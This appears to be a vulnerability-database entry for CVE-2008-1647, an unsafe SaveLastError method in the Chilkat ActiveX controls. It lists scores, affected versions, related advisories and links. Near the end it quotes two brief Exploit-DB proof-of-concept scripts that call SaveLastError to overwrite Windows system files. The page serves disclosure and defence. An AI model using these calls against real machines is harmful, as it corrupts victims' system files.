CVE-2008-1647
published 2008-04-02CVE-2008-1647: The ChilkatHttp.ChilkatHttp.1 and ChilkatHttp.ChilkatHttpRequest.1 ActiveX controls in ChilkatHttp.dll 2.4.0.0, 2.3.0.0, and earlier in ChilkatHttp ActiveX…
PriorityP344critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.01%
93.4th percentile
The ChilkatHttp.ChilkatHttp.1 and ChilkatHttp.ChilkatHttpRequest.1 ActiveX controls in ChilkatHttp.dll 2.4.0.0, 2.3.0.0, and earlier in ChilkatHttp ActiveX expose the unsafe SaveLastError method, which allows remote attackers to overwrite arbitrary files. NOTE: some of these details are obtained from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chilkat_software | chilkathttp_activex | <= 2.3.0.0 | — |
| chilkat_software | chilkathttp_activex | <= 2.4.0.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j7cv-6hwc-phxq: Insecure method vulnerability in the Chilkat Socket ActiveX control (ChilkatSocket
ghsa_unreviewed·2022-05-17·CVSS 9.3
CVE-2008-6959 [CRITICAL] GHSA-j7cv-6hwc-phxq: Insecure method vulnerability in the Chilkat Socket ActiveX control (ChilkatSocket
Insecure method vulnerability in the Chilkat Socket ActiveX control (ChilkatSocket.ChilkatSocket.1) in ChilkatSocket.dll 2.3.1.1 allows remote attackers to overwrite arbitrary files via the SaveLastError method. NOTE: this might be related to CVE-2008-1647.
GHSA
GHSA-p27x-w8mq-85x6: The ChilkatHttp
ghsa_unreviewed·2022-05-01
CVE-2008-1647 [HIGH] CWE-20 GHSA-p27x-w8mq-85x6: The ChilkatHttp
The ChilkatHttp.ChilkatHttp.1 and ChilkatHttp.ChilkatHttpRequest.1 ActiveX controls in ChilkatHttp.dll 2.4.0.0, 2.3.0.0, and earlier in ChilkatHttp ActiveX expose the unsafe SaveLastError method, which allows remote attackers to overwrite arbitrary files. NOTE: some of these details are obtained from third party information.
No detection rules found.
Exploit-DB
Chilkat FTP - ActiveX (SaveLastError) Insecure Method
exploitdb·2008-12-28
CVE-2008-4584 Chilkat FTP - ActiveX (SaveLastError) Insecure Method
Chilkat FTP - ActiveX (SaveLastError) Insecure Method
---
ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2
ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2 Arbitrary Data Write Exploit
function Do_it()
{
File = "c:\\boot_.ini"
ctrl.SaveLastError(File)
}
# milw0rm.com [2008-12-28]
Exploit-DB
ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite
exploitdb·2008-04-01
CVE-2008-1647 ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite
ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite
---
ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite
url: www.chilkatsoft.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Sub tryMe
test.SaveLastError "c:\windows\system_.ini"
MsgBox "Exploit completed!"
End Sub
# milw0rm.com [2008-04-01]
No writeups or analysis indexed.
http://secunia.com/advisories/29581http://www.securityfocus.com/bid/28546http://www.shinnai.altervista.org/index.php?mod=02_Forum&group=Security&argument=Remote_performed_exploits&topic=1207033569.ff.phphttp://www.vupen.com/english/advisories/2008/1050/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/45988https://www.exploit-db.com/exploits/5338http://secunia.com/advisories/29581http://www.securityfocus.com/bid/28546http://www.shinnai.altervista.org/index.php?mod=02_Forum&group=Security&argument=Remote_performed_exploits&topic=1207033569.ff.phphttp://www.vupen.com/english/advisories/2008/1050/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/45988https://www.exploit-db.com/exploits/5338
2008-04-02
Published